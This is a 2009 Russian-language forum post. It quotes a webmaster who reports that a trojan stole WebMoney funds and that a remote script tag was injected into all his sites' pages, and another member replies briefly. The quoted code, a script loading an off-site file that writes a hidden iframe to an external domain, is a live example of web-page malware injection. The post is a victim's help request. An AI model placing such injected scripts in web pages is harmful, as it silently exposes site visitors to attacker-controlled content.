02.09.2009, 02:07
|
|
Новичок
Регистрация: 29.06.2007
Сообщений: 18
Провел на форуме:
642141
Репутация:
17
|
|
Сообщение от LeRick
На днях у меня "похозяйничал" троян... Увели 3 бакса с webmoney. Вроде бы всё почистил. Но вчера заметил, что на всех моих сайтах в конце всех страниц index или main появился такой код
Код:
<script src=http://flo4.cn/1.txt></script>
По адресу flo4.cn/1.txt соответственно находится такой скрипт:
Код:
document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5' style='display: none;'></iframe>");
Я понимаю, что попало это туда скорее всего через Тотал Коммандер. Пароли к фтп все храню там (знаю, что небезопасно, но ничего ценного в тех сайтах нет).
Интересно, что происходит при срабатывании этого скрипта в конечном итоге? во первых- почисть host -папочку !! во вторых я думаю что сам панимаеш что ето значит document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5 !!! посмотри host файлы - там наверника что то левое !!((
|
|
|